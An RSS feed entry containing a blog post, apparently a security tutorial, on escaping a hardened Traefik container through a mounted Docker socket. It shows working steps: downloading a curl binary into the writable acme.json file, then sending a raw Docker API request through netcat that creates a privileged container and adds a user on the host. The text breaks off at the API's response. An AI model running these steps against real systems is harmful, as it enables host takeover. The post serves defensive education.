<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: David Gries</title>
    <description>The latest articles on Forem by David Gries (@dgries).</description>
    <link>https://forem.com/dgries</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1202021%2Ff445d49b-4627-4ba6-8f42-5a78d10e665d.jpeg</url>
      <title>Forem: David Gries</title>
      <link>https://forem.com/dgries</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/dgries"/>
    <language>en</language>
    <item>
      <title>Opening Pandora's Container - Gaining Host Access (Part 2)</title>
      <dc:creator>David Gries</dc:creator>
      <pubDate>Sat, 28 Sep 2024 16:43:37 +0000</pubDate>
      <link>https://forem.com/dgries/opening-pandoras-container-gaining-host-access-part-2-2i2c</link>
      <guid>https://forem.com/dgries/opening-pandoras-container-gaining-host-access-part-2-2i2c</guid>
      <description>&lt;p&gt;In my &lt;a href="https://dev.to/dgries/opening-pandoras-container-how-exposing-the-docker-socket-paves-the-way-to-host-control-part-1-1nm4"&gt;previous post&lt;/a&gt;, I gave you a quick rundown on the Docker socket and its purpose. But have you ever wondered how an attacker could exploit this to seize control of your host system? In this post, we’ll explore the potential risks associated with a mounted Docker socket and how these vulnerabilities can be exploited.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;code&gt;~ $ ./unveiling_the_threat&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;I’ve chosen Traefik as our example, and for good reason - it’s often exposed to the public internet, making it a tempting target. In the world of software, vulnerabilities are everywhere, just waiting to be found. An attacker only needs one way in to run code inside the Traefik container.&lt;/p&gt;

&lt;p&gt;While Traefik is generally recognized for its robust security features, it’s important to remember that no system is immune. Just last week, we saw the release of &lt;a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45410" rel="noopener noreferrer"&gt;CVE-2024-45410&lt;/a&gt;, which highlighted a critical security flaw. This example serves as a stark reminder: any publicly accessible endpoint can harbor hidden dangers, and vigilance is key to securing your systems.&lt;/p&gt;

&lt;p&gt;But let's get to the interesting part!&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;code&gt;~ $ ./status_quo&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;In last week’s post, I outlined a basic setup based on Traefik's documentation. However, in a real-world scenario, administrators typically implement various hardening measures. Let’s begin with a more realistic and secure configuration for Traefik, as defined in the following Docker Compose file:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;services&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;traefik&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;image&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;traefik:v3.1.4@sha256:6215528042906b25f23fcf51cc5bdda29e078c6e84c237d4f59c00370cb68440&lt;/span&gt;
    &lt;span class="na"&gt;container_name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;traefik&lt;/span&gt;
    &lt;span class="na"&gt;hostname&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;traefik&lt;/span&gt;
    &lt;span class="na"&gt;restart&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;unless-stopped&lt;/span&gt;
    &lt;span class="na"&gt;user&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;10000:10000&lt;/span&gt;
    &lt;span class="na"&gt;group_add&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s1"&gt;'&lt;/span&gt;&lt;span class="s"&gt;997'&lt;/span&gt;
    &lt;span class="na"&gt;networks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;proxy&lt;/span&gt;
    &lt;span class="na"&gt;ports&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;80&lt;/span&gt;
        &lt;span class="na"&gt;published&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;80&lt;/span&gt;
        &lt;span class="na"&gt;protocol&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;tcp&lt;/span&gt;
        &lt;span class="na"&gt;mode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;host&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;443&lt;/span&gt;
        &lt;span class="na"&gt;published&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;443&lt;/span&gt;
        &lt;span class="na"&gt;protocol&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;tcp&lt;/span&gt;
        &lt;span class="na"&gt;mode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;host&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;443&lt;/span&gt;
        &lt;span class="na"&gt;published&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;443&lt;/span&gt;
        &lt;span class="na"&gt;protocol&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;udp&lt;/span&gt;
        &lt;span class="na"&gt;mode&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;host&lt;/span&gt;
    &lt;span class="na"&gt;security_opt&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;no-new-privileges:true&lt;/span&gt;
    &lt;span class="na"&gt;cap_drop&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="s"&gt;ALL&lt;/span&gt;
    &lt;span class="na"&gt;read_only&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
    &lt;span class="na"&gt;volumes&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;bind&lt;/span&gt;
        &lt;span class="na"&gt;source&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;./configs/traefik.yaml&lt;/span&gt;
        &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/etc/traefik/traefik.yaml&lt;/span&gt;
        &lt;span class="na"&gt;read_only&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;bind&lt;/span&gt;
        &lt;span class="na"&gt;source&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;./configs/config.yaml&lt;/span&gt;
        &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/etc/traefik/config.yaml&lt;/span&gt;
        &lt;span class="na"&gt;read_only&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;bind&lt;/span&gt;
        &lt;span class="na"&gt;source&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/docker.sock&lt;/span&gt;
        &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/var/run/docker.sock&lt;/span&gt;
        &lt;span class="na"&gt;read_only&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
      &lt;span class="pi"&gt;-&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;bind&lt;/span&gt;
        &lt;span class="na"&gt;source&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;./acme.json&lt;/span&gt;
        &lt;span class="na"&gt;target&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;/etc/traefik/acme.json&lt;/span&gt;

&lt;span class="na"&gt;networks&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;proxy&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
    &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;proxy&lt;/span&gt;
    &lt;span class="na"&gt;external&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;As you can see, this setup does not run as root; instead, it operates as a user with limited permissions. The Docker group with ID &lt;code&gt;997&lt;/code&gt; is added to allow Traefik to communicate with the socket:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;david@debian:~&lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-ln&lt;/span&gt; /var/run/docker.sock 
srw-rw---- 1 0 997 0 Sep 28 08:46 /var/run/docker.sock
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The container uses a read-only root filesystem, and wherever feasible, files are mounted as read-only, including the Docker socket itself. The latest Traefik image and Docker version are utilized, all capabilities are dropped, and basic &lt;code&gt;security_opt&lt;/code&gt; options are configured. So, on the surface, this setup appears quite secure, right?&lt;/p&gt;

&lt;p&gt;Let’s take a deeper look inside the container!&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;code&gt;~ # ./compromised&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;Once inside the Traefik container, we can gather some basic system information and available tools:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;~ &lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;cat&lt;/span&gt; /etc/os-release 
&lt;span class="nv"&gt;NAME&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"Alpine Linux"&lt;/span&gt;
&lt;span class="nv"&gt;ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;alpine
&lt;span class="nv"&gt;VERSION_ID&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;3.20.3
&lt;span class="nv"&gt;PRETTY_NAME&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"Alpine Linux v3.20"&lt;/span&gt;
&lt;span class="nv"&gt;HOME_URL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"https://alpinelinux.org/"&lt;/span&gt;
&lt;span class="nv"&gt;BUG_REPORT_URL&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"https://gitlab.alpinelinux.org/alpine/aports/-/issues"&lt;/span&gt;
~ &lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; /usr/bin/
&lt;span class="o"&gt;[&lt;/span&gt;            chvt         &lt;span class="nb"&gt;dirname      &lt;/span&gt;free         ipcrm        &lt;span class="nb"&gt;md5sum       od           realpath     &lt;/span&gt;showkey      &lt;span class="nb"&gt;time         uniq         &lt;/span&gt;vlock
&lt;span class="o"&gt;[[&lt;/span&gt;           &lt;span class="nb"&gt;cksum        &lt;/span&gt;dos2unix     fuser        ipcs         mesg         openvt       renice       &lt;span class="nb"&gt;shred        timeout      &lt;/span&gt;unix2dos     volname
&lt;span class="nb"&gt;awk          &lt;/span&gt;clear        &lt;span class="nb"&gt;du           &lt;/span&gt;getconf      killall      microcom     passwd       reset        &lt;span class="nb"&gt;shuf         &lt;/span&gt;top          &lt;span class="nb"&gt;unlink       wc
basename     &lt;/span&gt;cmp          eject        getent       last         &lt;span class="nb"&gt;mkfifo       paste        &lt;/span&gt;resize       &lt;span class="nb"&gt;sort         tr           &lt;/span&gt;unlzma       wget
bc           &lt;span class="nb"&gt;comm         env          groups       &lt;/span&gt;ldd          mkpasswd     pgrep        scanelf      &lt;span class="nb"&gt;split        &lt;/span&gt;traceroute   unlzop       which
beep         cpio         &lt;span class="nb"&gt;expand       &lt;/span&gt;hd           less         nc           pkill        &lt;span class="nb"&gt;seq          &lt;/span&gt;ssl_client   traceroute6  unshare      &lt;span class="nb"&gt;who
&lt;/span&gt;blkdiscard   crontab      &lt;span class="nb"&gt;expr         head         &lt;/span&gt;logger       &lt;span class="nb"&gt;nl           &lt;/span&gt;pmap         setkeycodes  strings      tree         unxz         &lt;span class="nb"&gt;whoami
&lt;/span&gt;bunzip2      cryptpw      &lt;span class="nb"&gt;factor       &lt;/span&gt;hexdump      lsof         nmeter       &lt;span class="nb"&gt;printf       &lt;/span&gt;setsid       &lt;span class="nb"&gt;sum          truncate     &lt;/span&gt;unzip        whois
bzcat        &lt;span class="nb"&gt;cut          &lt;/span&gt;fallocate    &lt;span class="nb"&gt;hostid       &lt;/span&gt;lsusb        &lt;span class="nb"&gt;nohup        &lt;/span&gt;pscan        &lt;span class="nb"&gt;sha1sum      tac          tty          uptime       &lt;/span&gt;xargs
bzip2        dc           find         iconv        lzcat        &lt;span class="nb"&gt;nproc        &lt;/span&gt;pstree       &lt;span class="nb"&gt;sha256sum    tail         &lt;/span&gt;ttysize      uudecode     xxd
c_rehash     deallocvt    flock        &lt;span class="nb"&gt;id           &lt;/span&gt;lzma         nsenter      pwdx         sha3sum      &lt;span class="nb"&gt;tee          &lt;/span&gt;udhcpc6      uuencode     xzcat
cal          diff         &lt;span class="nb"&gt;fold         install      &lt;/span&gt;lzopcat      nslookup     &lt;span class="nb"&gt;readlink     sha512sum    test         unexpand     &lt;/span&gt;vi           &lt;span class="nb"&gt;yes&lt;/span&gt;
~ &lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;ls&lt;/span&gt; &lt;span class="nt"&gt;-ln&lt;/span&gt; /var/run/docker.sock 
srw-rw----    1 0        997              0 Sep 28 13:46 /var/run/docker.sock
~ &lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;whoami
whoami&lt;/span&gt;: unknown uid 10000
~ &lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;groups
&lt;/span&gt;10000groups: unknown ID 10000
 997groups: unknown ID 997
~ &lt;span class="nv"&gt;$ &lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;As observed, we have a minimal Alpine image, limiting our immediate options. However, we do have access to the Docker socket as a member of group '997', which has read-write permissions to the socket file! Do you remember the read_only mount option? This only prevents us from deleting the socket file, not writing to it.&lt;/p&gt;

&lt;p&gt;But how do we establish communication with the Docker API? One way would be to introduce additional tools onto the system. While we have limited utilities at our disposal, we can use the available &lt;code&gt;wget&lt;/code&gt; - albeit this is busybox's version, which unfortunately doesn’t seem to allow communication with local socket files.&lt;/p&gt;

&lt;p&gt;To complicate matters, the root filesystem is mounted as read-only, leaving us without a suitable target for downloading files, not even a temporary location like '/tmp'. However, there's a silver lining: Traefik requires access to the &lt;code&gt;acme.json&lt;/code&gt; file for storing certificate information, and this file is writable! By leveraging this space, we can inject a &lt;code&gt;curl&lt;/code&gt; binary into the container, enabling us to communicate with the Docker API:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;~ &lt;span class="nv"&gt;$ &lt;/span&gt;wget https://github.com/moparisthebest/static-curl/releases/download/v8.7.1/curl-amd64 &lt;span class="nt"&gt;-O&lt;/span&gt; /etc/traefik/acme.json
Connecting to github.com &lt;span class="o"&gt;(&lt;/span&gt;140.82.121.4:443&lt;span class="o"&gt;)&lt;/span&gt;
Connecting to objects.githubusercontent.com &lt;span class="o"&gt;(&lt;/span&gt;185.199.110.133:443&lt;span class="o"&gt;)&lt;/span&gt;
saving to &lt;span class="s1"&gt;'/etc/traefik/acme.json'&lt;/span&gt;
acme.json            100% |&lt;span class="k"&gt;**********************************************************************************************************************&lt;/span&gt;| 5310k  0:00:00 ETA
&lt;span class="s1"&gt;'/etc/traefik/acme.json'&lt;/span&gt; saved
~ &lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;chmod&lt;/span&gt; +x /etc/traefik/acme.json
~ &lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;alias &lt;/span&gt;&lt;span class="nv"&gt;curl&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s1"&gt;'/etc/traefik/acme.json'&lt;/span&gt;
~ &lt;span class="nv"&gt;$ &lt;/span&gt;curl &lt;span class="nt"&gt;--silent&lt;/span&gt; &lt;span class="nt"&gt;--unix-socket&lt;/span&gt; /var/run/docker.sock &lt;span class="s2"&gt;"http://localhost/version"&lt;/span&gt;
&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"Platform"&lt;/span&gt;:&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"Name"&lt;/span&gt;:&lt;span class="s2"&gt;"Docker Engine - Community"&lt;/span&gt;&lt;span class="o"&gt;}&lt;/span&gt;,&lt;span class="s2"&gt;"Components"&lt;/span&gt;:[&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"Name"&lt;/span&gt;:&lt;span class="s2"&gt;"Engine"&lt;/span&gt;,&lt;span class="s2"&gt;"Version"&lt;/span&gt;:&lt;span class="s2"&gt;"27.3.1"&lt;/span&gt;,&lt;span class="s2"&gt;"Details"&lt;/span&gt;:&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"ApiVersion"&lt;/span&gt;:&lt;span class="s2"&gt;"1.47"&lt;/span&gt;,&lt;span class="s2"&gt;"Arch"&lt;/span&gt;:&lt;span class="s2"&gt;"amd64"&lt;/span&gt;,&lt;span class="s2"&gt;"BuildTime"&lt;/span&gt;:&lt;span class="s2"&gt;"2024-09-20T11:41:11.000000000+00:00"&lt;/span&gt;,&lt;span class="s2"&gt;"Experimental"&lt;/span&gt;:&lt;span class="s2"&gt;"false"&lt;/span&gt;,&lt;span class="s2"&gt;"GitCommit"&lt;/span&gt;:&lt;span class="s2"&gt;"41ca978"&lt;/span&gt;,&lt;span class="s2"&gt;"GoVersion"&lt;/span&gt;:&lt;span class="s2"&gt;"go1.22.7"&lt;/span&gt;,&lt;span class="s2"&gt;"KernelVersion"&lt;/span&gt;:&lt;span class="s2"&gt;"6.1.0-25-amd64"&lt;/span&gt;,&lt;span class="s2"&gt;"MinAPIVersion"&lt;/span&gt;:&lt;span class="s2"&gt;"1.24"&lt;/span&gt;,&lt;span class="s2"&gt;"Os"&lt;/span&gt;:&lt;span class="s2"&gt;"linux"&lt;/span&gt;&lt;span class="o"&gt;}}&lt;/span&gt;,&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"Name"&lt;/span&gt;:&lt;span class="s2"&gt;"containerd"&lt;/span&gt;,&lt;span class="s2"&gt;"Version"&lt;/span&gt;:&lt;span class="s2"&gt;"1.7.22"&lt;/span&gt;,&lt;span class="s2"&gt;"Details"&lt;/span&gt;:&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"GitCommit"&lt;/span&gt;:&lt;span class="s2"&gt;"7f7fdf5fed64eb6a7caf99b3e12efcf9d60e311c"&lt;/span&gt;&lt;span class="o"&gt;}}&lt;/span&gt;,&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"Name"&lt;/span&gt;:&lt;span class="s2"&gt;"runc"&lt;/span&gt;,&lt;span class="s2"&gt;"Version"&lt;/span&gt;:&lt;span class="s2"&gt;"1.1.14"&lt;/span&gt;,&lt;span class="s2"&gt;"Details"&lt;/span&gt;:&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"GitCommit"&lt;/span&gt;:&lt;span class="s2"&gt;"v1.1.14-0-g2c9f560"&lt;/span&gt;&lt;span class="o"&gt;}}&lt;/span&gt;,&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"Name"&lt;/span&gt;:&lt;span class="s2"&gt;"docker-init"&lt;/span&gt;,&lt;span class="s2"&gt;"Version"&lt;/span&gt;:&lt;span class="s2"&gt;"0.19.0"&lt;/span&gt;,&lt;span class="s2"&gt;"Details"&lt;/span&gt;:&lt;span class="o"&gt;{&lt;/span&gt;&lt;span class="s2"&gt;"GitCommit"&lt;/span&gt;:&lt;span class="s2"&gt;"de40ad0"&lt;/span&gt;&lt;span class="o"&gt;}}]&lt;/span&gt;,&lt;span class="s2"&gt;"Version"&lt;/span&gt;:&lt;span class="s2"&gt;"27.3.1"&lt;/span&gt;,&lt;span class="s2"&gt;"ApiVersion"&lt;/span&gt;:&lt;span class="s2"&gt;"1.47"&lt;/span&gt;,&lt;span class="s2"&gt;"MinAPIVersion"&lt;/span&gt;:&lt;span class="s2"&gt;"1.24"&lt;/span&gt;,&lt;span class="s2"&gt;"GitCommit"&lt;/span&gt;:&lt;span class="s2"&gt;"41ca978"&lt;/span&gt;,&lt;span class="s2"&gt;"GoVersion"&lt;/span&gt;:&lt;span class="s2"&gt;"go1.22.7"&lt;/span&gt;,&lt;span class="s2"&gt;"Os"&lt;/span&gt;:&lt;span class="s2"&gt;"linux"&lt;/span&gt;,&lt;span class="s2"&gt;"Arch"&lt;/span&gt;:&lt;span class="s2"&gt;"amd64"&lt;/span&gt;,&lt;span class="s2"&gt;"KernelVersion"&lt;/span&gt;:&lt;span class="s2"&gt;"6.1.0-25-amd64"&lt;/span&gt;,&lt;span class="s2"&gt;"BuildTime"&lt;/span&gt;:&lt;span class="s2"&gt;"2024-09-20T11:41:11.000000000+00:00"&lt;/span&gt;&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;But to do this, the container would need access to github.com. So let's assume it can't access the internet at all. Is there still a way? Going back to the available tools, 'netcat' ('nc') has caught my eye. 'netcat' can be used to read and write data over network connections, which is exactly what we need to communicate with the docker API:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;~ &lt;span class="nv"&gt;$ &lt;/span&gt;nc &lt;span class="nt"&gt;-v&lt;/span&gt;
BusyBox v1.36.1 &lt;span class="o"&gt;(&lt;/span&gt;2024-06-10 07:11:47 UTC&lt;span class="o"&gt;)&lt;/span&gt; multi-call binary.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Although the BusyBox version of &lt;code&gt;netcat&lt;/code&gt; differs slightly from the commonly used OpenBSD version, it remains a viable option for our needs.&lt;/p&gt;

&lt;h2&gt;
  
  
  &lt;code&gt;full_control:x:1002:1002::/:/bin/sh&lt;/code&gt;
&lt;/h2&gt;

&lt;p&gt;So, what’s next? Access to the Docker socket effectively grants us full control over the underlying system. To illustrate this, we’ll create a user on the host system using just &lt;code&gt;netcat&lt;/code&gt; from within the Traefik container:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;~ &lt;span class="nv"&gt;$ &lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nt"&gt;-e&lt;/span&gt; &lt;span class="s2"&gt;"POST /containers/create HTTP/1.1&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s2"&gt;Host: localhost&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s2"&gt;Content-Type: application/json&lt;/span&gt;&lt;span class="se"&gt;\r\n&lt;/span&gt;&lt;span class="s2"&gt;Content-Length: &lt;/span&gt;&lt;span class="si"&gt;$(&lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="nt"&gt;-n&lt;/span&gt; &lt;span class="s1"&gt;'{
&amp;gt;     \"Image\": \"traefik@sha256:6215528042906b25f23fcf51cc5bdda29e078c6e84c237d4f59c00370cb68440\",
&amp;gt;     \"Cmd\": [\"sh\", \"-c\", \"nsenter --mount=/host/proc/1/ns/mnt -- /usr/sbin/useradd hacked\"],
&amp;gt;     \"HostConfig\": {
&amp;gt;       \"Privileged\": true,
&amp;gt;       \"NetworkMode\": \"host\",
&amp;gt;       \"Binds\": [\"/:/host\", \"/dev:/dev\"]
&amp;gt;     }
&amp;gt; }'&lt;/span&gt; | &lt;span class="nb"&gt;wc&lt;/span&gt; &lt;span class="nt"&gt;-c&lt;/span&gt;&lt;span class="si"&gt;)&lt;/span&gt;&lt;span class="se"&gt;\r\n\r\n&lt;/span&gt;&lt;span class="s2"&gt;{
&amp;gt;     &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;Image&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;: &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;traefik@sha256:6215528042906b25f23fcf51cc5bdda29e078c6e84c237d4f59c00370cb68440&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;,
&amp;gt;     &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;Cmd&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;: [&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;sh&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;, &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;-c&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;, &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;nsenter --mount=/host/proc/1/ns/mnt -- /usr/sbin/useradd hacked&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;],
&amp;gt;     &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;HostConfig&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;: {
&amp;gt;       &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;Privileged&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;: true,
&amp;gt;       &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;NetworkMode&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;: &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;host&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;,
&amp;gt;       &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;Binds&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;: [&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;/:/host&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;, &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;/dev:/dev&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s2"&gt;]
&amp;gt;     }
&amp;gt; }"&lt;/span&gt; | nc &lt;span class="nb"&gt;local&lt;/span&gt;:/var/run/docker.sock
HTTP/1.1 201 Created
Api-Version: 1.47
Content-Type: application/json
